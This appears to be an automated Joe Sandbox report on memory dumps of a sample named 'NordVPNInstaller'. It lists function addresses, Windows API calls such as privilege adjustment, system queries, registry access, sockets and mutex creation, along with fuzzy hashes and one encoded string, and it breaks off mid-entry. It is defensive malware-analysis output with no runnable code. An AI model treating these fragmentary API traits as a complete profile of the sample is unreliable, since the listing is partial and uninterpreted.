Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: f1c87d35e7550584cf358aed27ae84555959e6864ad830b661dd2310445bfb8c
Instruction ID: 39e8e46af0bad603044acad0b75c4b3dd44b9648a97430c75f9422b75d280d5f
Opcode Fuzzy Hash: f1c87d35e7550584cf358aed27ae84555959e6864ad830b661dd2310445bfb8c
Instruction Fuzzy Hash: 41216A754093C09FDB138B219C94AA2FFB4EF07320F0984CAE9C44B563D265A959DB62

Function 05DE244E Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05DE2497

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 2670b9b54911434610ed09a4b155bcb6a29a51237687a158de74f975e99b2670
Instruction ID: a4ffe6539ecae449b73dd8ea1c78ae78f9c50ce5c95a12409a35ff9b2f7fbfb1
Opcode Fuzzy Hash: 2670b9b54911434610ed09a4b155bcb6a29a51237687a158de74f975e99b2670
Instruction Fuzzy Hash: 511173795002049FDB20DF55D844B66FBE8FF14320F08C4AADD8A8BA52D375E454DB61

Function 05DE6B52 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE6B84

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 20d5d0ba30290bb65e5a041256a9317954248d2bcafda40a1f9d56f468725a2a
Instruction ID: e4321f9515d41a01c8fb6bf2108be92c27fd8a150d6d3935ff586f4c2d212bca
Opcode Fuzzy Hash: 20d5d0ba30290bb65e5a041256a9317954248d2bcafda40a1f9d56f468725a2a
Instruction Fuzzy Hash: F301AD759002409FDB10DF55E884B66FBE4EF54325F08C4ABDD898F746D279E408CBA2

Function 05DE2D92 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 05DE2DCD

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 56fc96726a05d7b7ef87db039d71d6f84d1387d12ff78db576b734961c1f0c85
Instruction ID: ec93d16d251407ddfdd637d0af23a05d60ece88073b44ed1a0458fda8d0e1120
Opcode Fuzzy Hash: 56fc96726a05d7b7ef87db039d71d6f84d1387d12ff78db576b734961c1f0c85
Instruction Fuzzy Hash: 9E018B799006409FEB60DF05D884B61FBE9FF58320F08C09ADE890A752D375E458DBA2

Function 053D1299 Relevance: .5, Instructions: 497COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2777847656.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc20926688eedd03018e6d98319cdc97496d3b84629fa9f103d5b1c137d417a4
Instruction ID: 059f5f4f4bfc5209f12da155ebc859844fb1da74e9a474c34fd53f0d0eaa32c8
Opcode Fuzzy Hash: fc20926688eedd03018e6d98319cdc97496d3b84629fa9f103d5b1c137d417a4
Instruction Fuzzy Hash: 0E021431B042004BDB28BB74E5683BEB6E7ABC5248F044469D4468F7D6DF7ACD4AC792

Function 0669A7E8 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2780316544.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03a28579990fd8893ca26e8a9bcb1430d723b237f5197601b1d1b9c5e7ad5aeb
Instruction ID: 863466306a3015d6ce210fed3884a0fca0690ad1cd292ab4289910ee8fa19f06
Opcode Fuzzy Hash: 03a28579990fd8893ca26e8a9bcb1430d723b237f5197601b1d1b9c5e7ad5aeb
Instruction Fuzzy Hash: 47A1CE74E00219CFDB54DFA9C584BEDBBF6AF88304F20806AD809AB355DB359985CF61

Function 0669A7D9 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2780316544.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53877d20c2d1b993a81fceb8e1f48ba0b86a3c940a9a317c5f8152e372e139b6
Instruction ID: 363e28b98717c58582e993cd022ca650a9bcc5d03ecd33713a5c427bbba0808c
Opcode Fuzzy Hash: 53877d20c2d1b993a81fceb8e1f48ba0b86a3c940a9a317c5f8152e372e139b6
Instruction Fuzzy Hash: 3591CFB4E00218DFDB54DFA9C984BEDBBF6AF88304F20816AD815AB354DB345945CF61

Function 0669A138 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2780316544.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3922c5b5dc39092d46dd4817d558bd87bc86465a5e58d860bbdc5af21b0929eb
Instruction ID: 70669ff654a406cf759b795f2e854a63391f8d989d5daa10963404d3519dea09
Opcode Fuzzy Hash: 3922c5b5dc39092d46dd4817d558bd87bc86465a5e58d860bbdc5af21b0929eb
Instruction Fuzzy Hash: BB5117B1D002298FDB68CFA6D8457DEFBF6AF89304F14C0AAC519A7254DB740A85CF90

Function 0669EAA8 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 435
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0669EF4E

Strings

f`k, xrefs: 0669ED63
f`k, xrefs: 0669ECF9
:@k, xrefs: 0669EADD
f`k, xrefs: 0669ED2E
f`k, xrefs: 0669EF49

Memory Dump Source

Source File: 00000000.00000002.2780316544.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID: :@k$f`k$f`k$f`k$f`k
API String ID: 2994545307-2661870366
Opcode ID: d7eba85022f1c4da9360d216941933900954b1b4dde0b2b9bb70bc9a9fe08e08
Instruction ID: 4f2706a69c90b0e16bf013ea70a86b46008a4d5b2c940a9d93e3595ba1d46be4
Opcode Fuzzy Hash: d7eba85022f1c4da9360d216941933900954b1b4dde0b2b9bb70bc9a9fe08e08
Instruction Fuzzy Hash: DCF14A30F00205CFCB54EB78D494AAEB7F6BF88304F158569D806AB355DB3AAC46CB91

Function 067F0F00 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 067F0F51

Strings

:@k, xrefs: 067F0FE9

Memory Dump Source

Source File: 00000000.00000002.2780424103.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67f0000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID: :@k
API String ID: 2994545307-2277858631
Opcode ID: 7330d264c0f8686a2ea461cd54d23fed8d3f9487459accfa3e0ab4947e385591
Instruction ID: e6818832a05e4f3a6d443e677eee2c23e8d4c12ec6230db7b0fa7f9aaa7e5e34
Opcode Fuzzy Hash: 7330d264c0f8686a2ea461cd54d23fed8d3f9487459accfa3e0ab4947e385591
Instruction Fuzzy Hash: 81C18B30B10118CBCB44DBB8D898AAEB7F2BF88314F518929D546AB755DB35EC46CB84

Function 067F0EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 316
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 067F0F51

Strings

:@k, xrefs: 067F0FE9

Memory Dump Source

Source File: 00000000.00000002.2780424103.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67f0000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID: :@k
API String ID: 2994545307-2277858631
Opcode ID: 609677159ceebd8dead19bd25db609ddc07c5e79506e6a521b0c9eb37b27a802
Instruction ID: 11de9da3ef2a9dc0949630b60c47905fac00caef450eca03a74a6c0f697835a3
Opcode Fuzzy Hash: 609677159ceebd8dead19bd25db609ddc07c5e79506e6a521b0c9eb37b27a802
Instruction Fuzzy Hash: 1AC18A30B10114CBCB44DBB8D898AAEB7F2BF88304F618929D546AB755DB35EC46CB94

Function 0669EEE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0669EF4E

Strings

f`k, xrefs: 0669EF49

Memory Dump Source

Source File: 00000000.00000002.2780316544.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID: f`k
API String ID: 2994545307-1028176591
Opcode ID: 83f88e1d6fe7cb5feb2568fca9f997284192b8147a0ee70ac4dff9a5ff54be37
Instruction ID: bc07ae1fc04f6aa3dcb309a68bdf4ad28d99a3ebeae887f4d4a192a28235349c
Opcode Fuzzy Hash: 83f88e1d6fe7cb5feb2568fca9f997284192b8147a0ee70ac4dff9a5ff54be37
Instruction Fuzzy Hash: A5513170B002099FDB44EF74E894AAEB7F6FB88214F148529E806DB354DB35AD45CBA1

Function 067F0007 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 067F00AE

Strings

E6gmIcugft%2B4klekaUp5TD0HTm3ta9fP/f23EV17g7cx5S9ETdDCGwIlj2W1roAI13vVpu8u2JVgkOJC8drAeyg0oafjbxpwMZVFgxCCrOHD%2BFjOLtMpFh0eSIB%2B, xrefs: 067F0064

Memory Dump Source

Source File: 00000000.00000002.2780424103.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67f0000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID: E6gmIcugft%2B4klekaUp5TD0HTm3ta9fP/f23EV17g7cx5S9ETdDCGwIlj2W1roAI13vVpu8u2JVgkOJC8drAeyg0oafjbxpwMZVFgxCCrOHD%2BFjOLtMpFh0eSIB%2B
API String ID: 2994545307-300865076
Opcode ID: 1c13da4116274866a826b2f718e133f7c01b286ddef06f435b6dd62c7886d1f3
Instruction ID: 654f3097ff6860753502a37aa5dcab9ab1ce146adeceecf032f6e1407ac8bb24
Opcode Fuzzy Hash: 1c13da4116274866a826b2f718e133f7c01b286ddef06f435b6dd62c7886d1f3
Instruction Fuzzy Hash: 1631A0319293858FD752CF74D864AA9BFB1FF46304F19849AC180DB3A3D7799844CBA2

Function 053D9D54 Relevance: 3.2, APIs: 2, Instructions: 249libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D9D97
LdrInitializeThunk.NTDLL ref: 053D9E4C

Memory Dump Source

Source File: 00000000.00000002.2777847656.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 82b2629aaf3f854db3b37fb5c11d1ca87c71529b71204bde2bf7e4012246d2a8
Instruction ID: 3f7fffbe44dbb2f89434bac7e767120618b90405d94a5e093a029c337e6a5443
Opcode Fuzzy Hash: 82b2629aaf3f854db3b37fb5c11d1ca87c71529b71204bde2bf7e4012246d2a8
Instruction Fuzzy Hash: 48A15830B042148BDB68DF25D9547AAB7F2FF98304F1081A9E84AA7784DF799D81CF90

Function 053D9D4B Relevance: 3.2, APIs: 2, Instructions: 244libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D9D97
LdrInitializeThunk.NTDLL ref: 053D9E4C

Memory Dump Source

Source File: 00000000.00000002.2777847656.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f97767b420c9e8e38b0cd535567817544b883022c99d26d3c3e990309e07d14d
Instruction ID: 613931858b3d8ac5e6c0e97b3e32a6bfea9ddff9b4a4ddce53d89c7a09aca9ed
Opcode Fuzzy Hash: f97767b420c9e8e38b0cd535567817544b883022c99d26d3c3e990309e07d14d
Instruction Fuzzy Hash: 5AA16830B042148BDB68DF21D9547AAB7F3FB98204F1081A9E84AA7784DF799D81CF90

Function 067F0070 Relevance: 1.7, APIs: 1, Instructions: 196
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 067F00AE

Memory Dump Source

Source File: 00000000.00000002.2780424103.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67f0000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ef3fc7c1a4dd8ad6b2e86683d45eecf2325416f7b8272037ae4d45f9853d98b6
Instruction ID: a484f1bc8897def4b5a6d718013bef030677875d8cc76501f3b83e8881a38949
Opcode Fuzzy Hash: ef3fc7c1a4dd8ad6b2e86683d45eecf2325416f7b8272037ae4d45f9853d98b6
Instruction Fuzzy Hash: 08714A34B102059FDB54DF74D8A9AAEBBF2BF88314F158429D905A7395CB39AC41CB90

Function 067F3ECE Relevance: 1.6, APIs: 1, Instructions: 139
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 067F4021

Memory Dump Source

Source File: 00000000.00000002.2780424103.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67f0000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7cf67630c7b9c7806632888fc7764c2dc5f3edb9de593b5c6e2faa1307cab534
Instruction ID: ed5b245f59cae024fd7d7a6e086dd02d46c1167a0b17dbf42e94df7460685f99
Opcode Fuzzy Hash: 7cf67630c7b9c7806632888fc7764c2dc5f3edb9de593b5c6e2faa1307cab534
Instruction Fuzzy Hash: F541C130F212049FC764EF74D594A6E77F3EF95204B20856EC2458B75AEB32D891CB91

Function 067F3F28 Relevance: 1.6, APIs: 1, Instructions: 117libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 067F4021

Memory Dump Source

Source File: 00000000.00000002.2780424103.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67f0000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28c1d42be71974144d65576264958b7f2425e78b6df8861123a45f3a6a975174
Instruction ID: 28e3e0bb60b163c2b6c349dfa8f66d1cd49c70b7743bdfa01f146fbd26779f8f
Opcode Fuzzy Hash: 28c1d42be71974144d65576264958b7f2425e78b6df8861123a45f3a6a975174
Instruction Fuzzy Hash: A041D230F203049FC768AF70D594A6F77E3FB95204B20856EC2024BB5AE772D891CB95

Function 0104BD62 Relevance: 1.6, APIs: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0104BE21

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dc1a8e8ee8c6b695995203d49b5a6bfe4f2385399e6673f21036fcb192de98d6
Instruction ID: fee4ee2158f887c4c75aa06d0f99dc3eeadcd128e65a173827fce004284359e2
Opcode Fuzzy Hash: dc1a8e8ee8c6b695995203d49b5a6bfe4f2385399e6673f21036fcb192de98d6
Instruction Fuzzy Hash: E231B3B1505380AFE722CF66DC84BA2BFE8EF46314F08849AE9858B653D335E409D771

Function 05DE1F1F Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 05DE1FF7

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: f5009e8d08f94c7af74b2c636e8c19c51fef16194549994e7cfb2a42faff9fd7
Instruction ID: 5f57a1f664b2fc23a248a19622ee1f19e529c27afc1d0706bb36ccf1ac78f95e
Opcode Fuzzy Hash: f5009e8d08f94c7af74b2c636e8c19c51fef16194549994e7cfb2a42faff9fd7
Instruction Fuzzy Hash: 4031D2B1404344AFE722CB61CC84FA6BBBCEF05314F04449AFA849B692D379A94DCB71

Function 05DE167A Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05DE1731

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 134443771b9b784b622561de85ac8bc628980e11c3641f564ba4d436eb4db6c5
Instruction ID: 9e57b28e23a0eee8c98c0317f5c268e0d2a9f4a38b9a25a3ab65966f390a56a6
Opcode Fuzzy Hash: 134443771b9b784b622561de85ac8bc628980e11c3641f564ba4d436eb4db6c5
Instruction Fuzzy Hash: 0231D2B2504344AFE7229F61CC44FA7BBECEF45310F08889AE9859B552D374E509CB71

Function 05DE03F8 Relevance: 1.6, APIs: 1, Instructions: 95networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 05DE04AA

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 262eb12c84645da4f74db204f2237a5e2e469d9c6cba01f6c577caacd77eafe8
Instruction ID: 0e072095cccd58a67c3ddef217f9862daa39cfd35adb3625f5d4d2b74e9ff47d
Opcode Fuzzy Hash: 262eb12c84645da4f74db204f2237a5e2e469d9c6cba01f6c577caacd77eafe8
Instruction Fuzzy Hash: 9631A4714093C0AFD7238B65CD44F56BFB4EF46310F0884DBE9858B5A3C269A919CB72

Function 05DE12F7 Relevance: 1.6, APIs: 1, Instructions: 95encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000E24,?,?), ref: 05DE13BA

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: 73036f1a061c84d7ec56161e8d09468ef2c2307d8e47674bf8b83b26a5f35d7d
Instruction ID: b100d6030ca21862c3970051c8694439915f59228e612fe9cac33168fcdb4449
Opcode Fuzzy Hash: 73036f1a061c84d7ec56161e8d09468ef2c2307d8e47674bf8b83b26a5f35d7d
Instruction Fuzzy Hash: CA318F7150D3C45FD3038B258C61AA2BFB4EF87614F0A84CBD8849F6A3D624691AC7B2

Function 05DE11F9 Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE12AD

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 767b40458d81268d09ea282a1a06049454be0acc81ecc7c0900c2aec1aa59143
Instruction ID: ad0aef470d3966e11b3ad550a46c674cda19b36d9abd5ec2f33fb507b448e99f
Opcode Fuzzy Hash: 767b40458d81268d09ea282a1a06049454be0acc81ecc7c0900c2aec1aa59143
Instruction Fuzzy Hash: 6E318F75509780AFEB228B51CC44FA6BFF8FF06314F08849BE9858B562D334E949CB61

Function 05DE187A Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05DE1926

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 315c2158679742c63b0551bdbc9eb4278bbe6993312b47c95552bf06328b96e0
Instruction ID: 6a9c29805be44f5c9f7678ab0a632f1f8151102b1d3e386c1132b6097fd898a7
Opcode Fuzzy Hash: 315c2158679742c63b0551bdbc9eb4278bbe6993312b47c95552bf06328b96e0
Instruction Fuzzy Hash: 2531F6B1509380AFE7228B61DC44FA6BFB8EF06310F08849BE9848B653D234E90DC771

Function 05DE102C Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE10C9

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 4e5fcbffae0e77007444cb0c80db7ddc2435974fd2c0aee897e1da6cb200cfe3
Instruction ID: 04b7c0791200b11d6ed01ff2da5ba11042f0bd9f81de68cfbe80bc54f2c97ade
Opcode Fuzzy Hash: 4e5fcbffae0e77007444cb0c80db7ddc2435974fd2c0aee897e1da6cb200cfe3
Instruction Fuzzy Hash: 5E31F4765097806FDB228F61CC44BA6BFB8EF46320F08849BE8858F593D224A549CB71

Function 05DE0820 Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 05DE08B7

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 988f29790974ca5b6825f2713ee4da36b6f22da09771ebc8b71f5b0e8880f802
Instruction ID: 937f7366ad83ec8e36f092ca3c891303e652b259bb15e4caf3ed8ff77e458fd5
Opcode Fuzzy Hash: 988f29790974ca5b6825f2713ee4da36b6f22da09771ebc8b71f5b0e8880f802
Instruction Fuzzy Hash: 2C31BF76504384AFEB218B65DC44FA7BBB8EF45320F08849AE984DB652D364E948CB71

Function 0104B6CD Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 0104B788

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 89c2b077b6e6dcafbda2a1d52a8a3ae0c1f2179a7648502ff69e4025c790abb7
Instruction ID: 654faaa23b38bdc1da555c11ee97cb8205ee0d4a6717db933dbd7c4938616653
Opcode Fuzzy Hash: 89c2b077b6e6dcafbda2a1d52a8a3ae0c1f2179a7648502ff69e4025c790abb7
Instruction Fuzzy Hash: 4D31AFB55093846FE722CB25CC84FA2BFE8EF06314F0884DAE9858B653D264E548CB61

Function 05DE0722 Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE07CC

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 882cb7e5a04b4088d3833e5c23b3ab99f91e39d46acbc5e75e785b50b5377353
Instruction ID: e0d5811145bcb7f98fcad711894c8ab2768211cd81ae75600e667544b24af078
Opcode Fuzzy Hash: 882cb7e5a04b4088d3833e5c23b3ab99f91e39d46acbc5e75e785b50b5377353
Instruction Fuzzy Hash: 713180765097806FE722CB25CC44F92BFF8EF46314F0884DBE9858B563D264A949CB61

Function 0104B5D9 Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 0104B685

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: c6c5234bcb6e87575afe8bd79e542c0767392622dcf43a32e3883d21f9e61df3
Instruction ID: bb48abf10c45193688804d5723f0daf473919f28fab9cba47d265b21b94e75a1
Opcode Fuzzy Hash: c6c5234bcb6e87575afe8bd79e542c0767392622dcf43a32e3883d21f9e61df3
Instruction Fuzzy Hash: 8B218FB6404344AFE7218F55CC84FA7BBFCEF09310F08849AE9859B652D325E548CB61

Function 05DE0C6D Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 05DE0D0D

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 1048d8e599fb44798b5cf943120f8b4c74146d4e48834d884f0c5fbbb57e8179
Instruction ID: 81f778896ea23ffb2d2af8f5ce59af304582119b97d2d9686a2518291b8d245d
Opcode Fuzzy Hash: 1048d8e599fb44798b5cf943120f8b4c74146d4e48834d884f0c5fbbb57e8179
Instruction Fuzzy Hash: C031B4B1509380AFE711CB65CD49F66FFF8EF05210F08849AE985CB652D375E948CB61

Function 05DE1F52 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

